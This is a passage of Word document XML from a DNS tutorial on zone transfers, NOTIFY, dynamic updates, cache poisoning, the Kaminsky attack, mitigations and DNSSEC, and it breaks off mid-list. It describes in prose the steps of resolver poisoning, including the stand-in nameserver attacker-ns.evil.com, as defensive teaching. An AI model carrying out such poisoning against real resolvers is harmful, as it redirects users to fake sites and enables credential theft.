    <w:p w14:paraId="5EF2E444" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used when:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Secondary has no data (fresh setup) or has diverged significantly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272BDDCB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IXFR (Incremental Zone Transfer):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E88D76" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="759"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Secondary sends IXFR query including its current serial number.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C87C41A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="759"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Primary compares serials. If it can compute the delta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7B0A4A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="759"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Sends only the CHANGES since that serial (additions and deletions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4681A4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="759"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Much less data transferred.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E8325E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTIFY mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E1060F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="760"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Problem: Secondary polls primary every refresh interval (from SOA, e.g., 2 hours) to check for updates. Changes take up to 2 hours to propagate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB232FC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="760"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>Solution: When the primary zone changes, it sends a DNS NOTIFY message to all secondaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615AB69A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="760"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Secondaries immediately initiate an IXFR/AXFR upon receiving NOTIFY.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701C0F9A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="760"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Result: Propagation in seconds instead of hours.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8F8918" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.3 Dynamic DNS Updates (RFC 2136)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408B4B30" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The mechanism for programmatic DNS changes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD058D0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Instead of editing zone files manually, clients send UPDATE messages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EBFE60" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298A8869" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>UPDATE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429FEE53" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  Zone: example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C86B940" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  Prerequisite: (optional conditions that must be true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277D9096" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  Update: ADD www.example.com 60 IN A 10.0.1.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17209726" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">          DELETE www.example.com 60 IN A 10.0.1.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58533950" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCA87DC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="761"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>DHCP servers: automatically register hostnames for devices getting IP leases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CAB592" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="761"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Kubernetes: CoreDNS dynamically adds/removes records as pods come and go.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A49A26" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="761"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Auto-scaling: new instances register themselves in DNS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBA843D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="761"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Service discovery: services register their endpoints on startup, deregister on shutdown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716FE93B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Dynamic updates are authenticated via TSIG (Transaction Signatures) — shared secret HMAC — or GSS-TSIG (Kerberos).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D536ACD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:pict w14:anchorId="114C2F01">
          <v:rect id="_x0000_i3484" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="343529BE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. DNS Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768F2DD2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.1 DNS Spoofing / Cache Poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDDBC49" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8D250B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="762"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Attacker sends a forged DNS response to a recursive resolver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D2FFD2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="762"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The response claims: www.bank.com = [attacker's IP].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ACF9A0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="762"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>If the resolver accepts it (matching transaction ID and question), it caches the poisoned entry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF13CE6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="762"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>All subsequent clients querying this resolver for www.bank.com are directed to the attacker's server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BA3239" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="762"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Attacker serves a fake banking website, steals credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5925997C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this is possible:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127E0FA7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="763"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>DNS queries use UDP. Anyone can send a packet pretending to be from the authoritative server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092B38D6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="763"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The only "authentication" is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3021F0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="763"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Matching the 16-bit transaction ID (only 65,536 possibilities — guessable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0392D6DF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="763"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Matching the question section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3349E4F5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="763"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Arriving before the real response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E14A78" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Kaminsky Attack (2008):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F2B1AA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="764"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Attacker queries the resolver for random123.example.com (guaranteed cache miss).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169698F5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="764"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Resolver queries example.com's authoritative server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A76AC72" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="764"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Attacker floods the resolver with forged responses for random123.example.com, each attempting a different transaction ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C26928" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="764"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The forged response also includes a poisoned AUTHORITY section: example.com NS → attacker-ns.evil.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E48F1E8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="764"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>If one forged response matches the transaction ID → the resolver caches the attacker's nameserver for ALL of example.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F752AF9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="764"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Every subsequent query for anything under example.com goes to the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFE5632" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigations (before DNSSEC):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143D776F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="765"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Source port randomization:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Instead of using one fixed source port, randomize the UDP source port for each query. Now the attacker must guess both the 16-bit transaction ID AND the 16-bit source port = 2^32 possibilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151BAACE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="765"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0x20 encoding:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> Randomly capitalize letters in the query name (wWw.ExAmPlE.cOm). The authoritative server echoes back the same </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>capitalization. The attacker doesn't know the pattern → can't forge a matching response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61744D44" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="765"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Response validation:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Verify the response comes from the expected server IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C51EE4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.2 DNSSEC — Cryptographic Authentication of DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363EEDF7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What DNSSEC provides:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273BEE1B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="766"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Authenticity:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> The response genuinely came from the authoritative source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412A3F53" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="766"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Integrity:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> The response wasn't modified in transit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCC31DD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="766"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Authenticated denial:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Proof that a name does NOT exist (can't be forged).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A1B58B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What DNSSEC does NOT provide:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BE4933" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="767"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Confidentiality:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Queries/responses are still visible (use DoH/DoT for privacy).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0AE9BD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="767"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Availability:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Doesn't protect against DDoS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B5EB0C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How DNSSEC works — the chain of trust:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C072113" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="768"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Zone signing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588C9717" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="768"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The zone owner generates a key pair: ZSK (Zone Signing Key).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248D283F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="768"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Every record set in the zone is signed: the signature is stored as an RRSIG record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564DB906" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="768"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The zone's public key is published as a DNSKEY record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC00799" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="768"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Establishing trust (DS records):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F0726B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="768"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>A hash of the zone's public key (KSK — Key Signing Key) is placed in the PARENT zone as a DS (Delegation Signer) record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6233D5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="768"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The parent zone is itself signed, with its DS in ITS parent, all the way up to the root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286B5EBA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="768"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The root zone's keys are the trust anchors (hardcoded in resolvers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1DD213" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="768"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Validation by the resolver:</w:t>
      </w:r>
    </w:p>
